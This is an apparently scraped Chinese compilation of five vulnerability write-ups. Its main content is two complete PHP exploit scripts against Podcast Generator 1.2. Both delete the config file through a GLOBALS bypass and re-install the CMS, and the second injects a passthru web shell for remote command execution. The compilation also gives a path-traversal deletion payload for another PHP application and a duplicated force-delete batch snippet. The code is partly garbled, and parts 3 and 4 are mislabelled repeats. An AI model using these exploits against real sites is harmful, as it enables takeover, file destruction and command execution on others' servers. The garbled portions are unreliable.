Podcast Generator多个模块文件包含和任意文件删除漏洞(精选5篇)由网友“再见了运动男孩”投稿提供,下面是小编为大家推荐的Podcast Generator多个模块文件包含和任意文件删除漏洞,欢迎大家分享。
篇1:Podcast Generator多个模块文件包含和任意文件删除漏洞
影响版本:
Podcast Generator 1.2
程序介绍:
Podcast Generator是用PHP编写的免费播客发布脚本,
漏洞分析:
Podcast Generator的core/archive_cat.php、core/admin/itunescategories.php和core /admin/login.php页面没有正确地过滤对GLOBALS[absoluteurl]参数所传送的输入,core/themes.php页面没有正确地过滤对GLOBALS[theme_path]参数所传送的输入,这可能用于包含本地或外部资源的任意文件;此外core/admin /delete.php页面没有正确地过滤对file和ext“参数所传送的输入,可能导致删除任意文件。成功利用这些漏洞要求打开了 register_globals。
漏洞利用:
#
# Podcast Generator <= 1.2 unauthorized CMS Re-Installation Remote Exploit
#
# by staker
# --------------------------------------
# mail: staker[at]hotmail[dot]it
# url: podcastgen.sourceforge.net
# --------------------------------------
#
# it works with register_globals=on
#
# short explanation:
#
# ----------------------------------------
# Podcast Generator contains one flaw that
# allows an attacker to re-install the cms
# because of unlink in'delete.php'file
# ----------------------------------------
# Look at'/core/admin/delete.php'
# (removed author's comments)
/*
if (isset($_REQUEST['absoluteurl']) OR isset($_REQUEST['amilogged']) OR isset($_REQUEST['theme_path']))
{ exit; } <-------- {1}
if ($amilogged != ”true“) { exit; } <-------{2}
if (isset($_GET['file']) AND $_GET['file']!=NULL) {
$file = $_GET['file'];
$ext = $_GET['ext'];
if (file_exists(”$absoluteurl$upload_dir$file.$ext“)) {
unlink (”$upload_dir$file.$ext“); <--------{3}
$PG_mainbody .=”
$file.$ext$L_deleted
“;
}
*/
#
# Explanation (code snippet above [points])
# -----------------------------------------------------------------------------------
# 1. blocks all'amilogged'REQUEST variables,what about GLOBALS?,therefore useless!
# 2.if'amilogged'isn't true ->exit()functionactivated.
# 3. unlink()deletean existing file.
# -----------------------------------------------------------------------------------
#
# It's possible to delete 'config.php' to re-install the cms. we need 'amilogged'
# set to true. We candoit using a GLOBALS variable.
#
# admin/core/delete.php?GLOBALS[amilogged]=true&file=../../config&ext=php
#
# Various:
# --------------------------------------------------
# They didn't help me but i want to give a thanks to
# girex,skerno,Chaomel,XaDoS,Dante90andGianluka_95
# --------------------------------------------------
# Today is: 02 June .
# Location: Italy,Turin.
# www. .com/watch?v=dBc7mK5iAH0
# --------------------------------------------------
error_reporting(E_STRICT ^ E_WARNING);
if($argc< 2) start_usage();
$host=$argv[1];
$path=$argv[2];
re_install();
functionsend_request($data)
{
global$host;
if(!$sock= @fsockopen($host,80)) {
die(”connection refused..\n“);
}
if(isset($data)) {
fputs($sock,$data);
}
while(!feof($sock)) {$result.=fgets($sock); }
fclose($sock);
return$result;
}
functionremove_config()
{
global$host,$path;
$in_lex=”/{$path}/core/admin/delete.php?GLOBALS[amilogged]=true&file=../../config&ext=php“;
$config=”GET {$in_lex} HTTP/1.1\r\n“;
$config.=”User-Agent: Lynx (textmode)\r\n“;
$config.=”Host: {$host}\r\n“;
$config.=”Connection: close\r\n\r\n“;
$lol= send_request($config);
if(check_config() != FALSE) {
die(”register_globals=off, exploit failed!\n“);
}
else{
returntrue;
}
}
functionre_install()
{
global$host,$path;
$binary=”username=staker&password=killingyourself&password2=killingyourself&setuplanguage=en“;
$config=”POST {$path}/setup/index.php?step=5 HTTP/1.1\r\n“;
$config.=”User-Agent: Lynx (textmode)\r\n“;
$config.=”Host: {$host}\r\n“;
$config.=”Content-Type: application/x-www-form-urlencoded\r\n“;
$config.=”Content-Length: “.strlen($binary).”\r\n“;
$config.=”Connection: close\r\n\r\n“;
$config.=$binary;
remove_config();
$content= send_request($config);
if(eregi('Creation of the configuration file',$content)) {
echo”[ re-installed successful\n“;
echo”[ username: staker\n[ password: killingyourself\n“;exit(0);
}
else{
die(”Exploit failed\n“);
}
}
functioncheck_config()
{
global$host,$path;
$config=”GET /{$path}/config.php HTTP/1.1\r\n“;
$config.=”User-Agent: Lynx (textmode)\r\n“;
$config.=”Host: {$host}\r\n“;
$config.=”Connection: close\r\n\r\n“;
$content= send_request($config);
if(ereg('HTTP/1.1 404 Not Found',$content)) {
returnfalse;
}
else{
returntrue;
}
}
functionstart_usage()
{
print”[*--------------------------------------------------------------------------*]\n“.
”[* Podcast Generator <= 1.2 unauthorized CMS Re-Installation Remote Exploit *]\n“.
”[*--------------------------------------------------------------------------*]\n“.
”[* Usage: php podcast_xpl.php [host] [path] *]\n“.
”[* [host] host -> example: localhost *]\n“.
”[* [path] path -> example: /podcast *]\n“.
”[*--------------------------------------------------------------------------*]\n“;
die();
}
#!/usr/bin/php -q -d short_open_tag=on
echo”
Podcast Generator <= 1.1 Remote Code Execution
Vendor: podcastgen.sourceforge.net
Exploit Author: BlackHawk
Author's Site: itablackhawk.altervista.org
Credits goes to RGodforthe code
Thanks to Marija justforexist :)
“;
if($argc<4) {
echo”
Usage: php“.$argv[0].”host /path/ command
Es: php“.$argv[0].”localhost / dir
“;
die;
}
/*
Bugs explanation:
This app has tons of bugs, but because of his structure lot of them are useless.. but not them all!
Look at 'core/admin/delete.php' (i have omitted the author comments):
---------------------------
if (isset($_REQUEST['absoluteurl']) OR isset($_REQUEST['amilogged']) OR isset($_REQUEST['theme_path'])) { exit; }
if (isset($_GET['file']) AND $_GET['file']!=NULL) {
$file = $_GET['file'];
$ext = $_GET['ext'];
if (file_exists(”$absoluteurl$upload_dir$file.$ext“)) {
unlink (”$upload_dir$file.$ext“);
$PG_mainbody .=”
$file.$ext$L_deleted
“;
}
---------------------------
no check for admin rights, so now we can delete whatever file we want, with any exstension..
so let's delete config.php and make a rfesh new installation with a password set by us!
the RCE is triggered in 'core/admin/scriptconfig.php', line 56:
---------------------------
// recent in home
$recent = $_POST['recent'];
if ($recent != ”“) {
$max_recent = $recent;
}
---------------------------
no sanitize of the input and no quotes added when writting to the config file (so no need mq=off)
BlackHawk */ error_reporting(0); ini_set(”max_execution_time“,0); ini_set(”default_socket_timeout“,5); functionquick_dump($string) { $result='';$exa='';$cont=0; for($i=0;$i<=strlen($string)-1;$i++) { if((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=” .“;} else {$result.=” “.$string[$i];} if(strlen(dechex(ord($string[$i])))==2) {$exa.=” “.dechex(ord($string[$i]));} else {$exa.=” 0“.dechex(ord($string[$i]));} $cont++;if($cont==15) {$cont=0;$result.=”\r\n“;$exa.=”\r\n“;} } return$exa.”\r\n“.$result; } $proxy_regex='(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; functionsendpacketii($packet) { global$proxy,$host,$port,$html,$proxy_regex; if($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if(!$ock) { echo'No response from '.$host.':'.$port;die; } } else{ $c= preg_match($proxy_regex,$proxy); if(!$c) { echo'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo”Connecting to “.$parts[0].”:“.$parts[1].” proxy...\r\n“; $ock=fsockopen($parts[0],$parts[1]); if(!$ock) { echo'No response from proxy...';die; } } fputs($ock,$packet); if($proxy=='') { $html=''; while(!feof($ock)) { $html.=fgets($ock); } } else{ $html=''; while((!feof($ock))or(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $cmd=”“; for($i=3;$i<=$argc-1;$i++){ $cmd.=” “.$argv[$i]; } $port=80; $proxy=”“; if(($path[0]'/')or($path[strlen($path)-1]'/')) {echo'Error... check the path!';die;} if($proxy=='') {$p=$path;}else{$p=''.$host.':'.$port.$path;} echo”Step1 - Delete config.inc\r\n“; $packet=”GET “.$p.”core/admin/delete.php?file=../../config&ext=php HTTP/1.0\r\n“; $packet.=”Host: “.$host.”\r\n“; $packet.=”Connection: Close\r\n\r\n“; sendpacketii($packet); echo”Step2 - Creating new configuration\r\n“; $data=”username=new_user_name&password=blackhawk&password2=blackhawk&setuplanguage=en“; $packet=”POST “.$p.”/setup/index.php?step=5 HTTP/1.0\r\n“; $packet.=”Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n“; $packet.=”Accept-Language: it\r\n“; $packet.=”Content-Type: application/x-www-form-urlencoded\r\n“; $packet.=”Accept-Encoding: gzip, deflate\r\n“; $packet.=”User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n“; $packet.=”Host: “.$host.”\r\n“; $packet.=”Content-Length: “.strlen($data).”\r\n“; $packet.=”Connection: Close\r\n“; $packet.=”Cache-Control: no-cache\r\n\r\n“; $packet.=$data; sendpacketii($packet); echo”Step3 - Logging in\r\n“; $data=”user=new_user_name&password=blackhawk“; $packet=”POST “.$p.”?p=admin HTTP/1.0\r\n“; $packet.=”Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n“; $packet.=”Accept-Language: it\r\n“; $packet.=”Content-Type: application/x-www-form-urlencoded\r\n“; $packet.=”Accept-Encoding: gzip, deflate\r\n“; $packet.=”User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n“; $packet.=”Host: “.$host.”\r\n“; $packet.=”Content-Length: “.strlen($data).”\r\n“; $packet.=”Connection: Close\r\n“; $packet.=”Cache-Control: no-cache\r\n\r\n“; $packet.=$data; sendpacketii($packet); $temp=explode(”Set-Cookie: “,$html); $temp2=explode(” “,$temp[1]); $PHPid=$temp2[0]; echo”Step4 - Sending shell\r\n“; $data=”streaming=yes&fbox=yes&cats=yes&newsinadmin=yes&strictfilename=yes&recent=5; if (isset(\$_GET[cmd])){if(get_magic_quotes_gpc()){\$_GET[cmd]=stripslashes(\$_GET[cmd]);}echo 666999;passthru(\$_GET[cmd]);echo 666999;}\$xyz=5&recentinfeed=All&selectdateformat=d-m-Y&scriptlanguage=en“; $packet=”POST “.$p.”?do=config&p=admin&action=change HTTP/1.0\r\n“; $packet.=”Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n“; $packet.=”Accept-Language: it\r\n“; $packet.=”Content-Type: application/x-www-form-urlencoded\r\n“; $packet.=”Accept-Encoding: gzip, deflate\r\n“; $packet.=”User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n“; $packet.=”Host: “.$host.”\r\n“; $packet.=”Cookie: $PHPid\r\n“; $packet.=”Content-Length: “.strlen($data).”\r\n“; $packet.=”Connection: Close\r\n“; $packet.=”Cache-Control: no-cache\r\n\r\n“; $packet.=$data; sendpacketii($packet); echo”Step5 - Executing Command\r\n\r\n“; $packet=”GET “.$p.”config.php?cmd=dir HTTP/1.0\r\n“; $packet.=”Host: “.$host.”\r\n“; $packet.=”Connection: Close\r\n\r\n“; $packet.=$data; sendpacketii($packet); if(strstr($html,”666999“)) { echo”Exploit succeeded...\r\n“; $temp=explode(”666999“,$html); die(”\r\n“.$temp[1].”\r\n“); } ?>
解决方案:
厂商补丁:
Alberto Betella
---------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
podcastgen.sourceforge.net/download.php?lang=en
信息来源:
<*来源:BlackHawk
链接:secunia.com/advisories/35333/
milw0rm.com/exploits/8860
*>
篇2:记事狗任意文件删除漏洞预警
利用条件:
1.仅限于windows主机,linux无效(至少我本机就不行)
2.已注册用户
3.需要删除的文件可读写
在modules/ajax/event.mod.php中
www.xxxx.com
#保护性删除图片
function doUnlink($pic){
if(!$pic) return false;
0 = trim(strtolower(end(explode(”.“,$pic))));
$exp = '././images/event/[0-9]{10}'.MEMBER_ID.'_b.'.0;
if(ereg($exp,$pic)){
unlink($pic);
unlink(strtr($pic,'_b.','_s.'));
return true;
}else {
return false;
}
}
该函数在 onloadPic中被调用
if($_FILES['pic']['name']){
//省略.....................
$hid_pic = $this->Post['hid_pic'];
$eid = (int) $this->Post['id'];
$this->doUnlink($hid_pic,$eid);
//省略.............
}
只要$_FILES['pic']['name'] 不为空,然后我们就可以构造hid_pic了
hid_pic 的内容为:
././images/event/1234567890{MEMBER_ID}_b.{你要删除的文件的后缀}/../../../{你要删除的文件}
比如我们要删除./data/install.lock文件,而且我的MEMBER_ID为2 则:
././images/event/12345678902_b.lock/../../../data/install.lock
本地测试成功
实际利用:
在 index.php?mod=event&code=pevent
上传抓包,然后在hid_pic底下填写././images/event/12345678902_b.lock/../../../data/install.lock 即可
修复方案:
do it yourself
篇3:强制删除任意文件以及文件夹漏洞预警
DEL /F /A /Q \\?\%1
RD /S /Q \\?\%1
保存为*.bat
将要删除的文件以及文件夹拖到该批处理上,
强制删除任意文件以及文件夹漏洞预警
,
篇4:强制删除任意文件以及文件夹
DEL /F /A /Q \\?\%1
RD /S /Q \\?\%1
保存为*.bat
将要删除的文件以及文件夹拖到该批处理上,
强制删除任意文件以及文件夹
,
篇5:ewebeditor for php任意文件上传漏洞
此漏洞仅测试了最新版v3.8,不知道低版本是否存在此漏洞,PHP版本的ewebeditor并没有使用数据库来保存配置信息,所有信息位于php/config.php中,代码如下:
$sUsername = ”admin“;
$sPassword = ”admin“;
$aStyle[1] = ”gray|||gray|||office|||../uploadfile/|||550|||350|||rar|zip|exe|doc|xls|chm|hlp|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office标准风格,部分常用按钮,标准适合界面宽度|||1|||zh-cn|||0|||500|||300|||0|||版权所有...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1|||1“;
........
它将所有的风格配置信息保存为一个数组$aStyle,在register_global为on的情况下我们可以任意添加自己喜欢的风格,然后就可以在自己添加的风格中可以随意定义可上传文件类型。
这漏洞成因很简单,下面给个exp
URL:
file:
漏洞修补方法:
初始化数组$aStyle
$sUsername = ”admin“;
$sPassword = ”admin“;
$aStyle. = array();
$aStyle[1] = ”gray|||gray|||office|||../uploadfile/|||550|||350|||rar|zip|exe|doc|xls|chm|hlp|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office标准风格,部分常用按钮,标准适合界面宽度|||1|||zh-cn|||0|||500|||300|||0|||版权所有...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1|||1";
★ 网络安全的论文
★ Linux Kiss Server lks.c文件多个格式串处理漏洞
★ 旅游网站策划书
【Podcast Generator多个模块文件包含和任意文件删除漏洞(精选5篇)】相关文章:
Discuz论坛宣传与优化技巧概述2022-06-22
浅析基于可验证计算的可信云计算优秀论文2023-03-02
会计电算化试题2022-05-07
软件技术方案范文2022-04-29
Linux升级Glibc时系统奔溃是什么原因如何解决2022-04-30
会计电算化考试题库2022-04-29
PHP安全 XSS篇2022-08-02
瑞星个人防火墙修复Windows系统漏洞教程2023-05-29
后门750字作文2022-09-01
浅谈用delphi来编写蠕虫病毒2022-06-27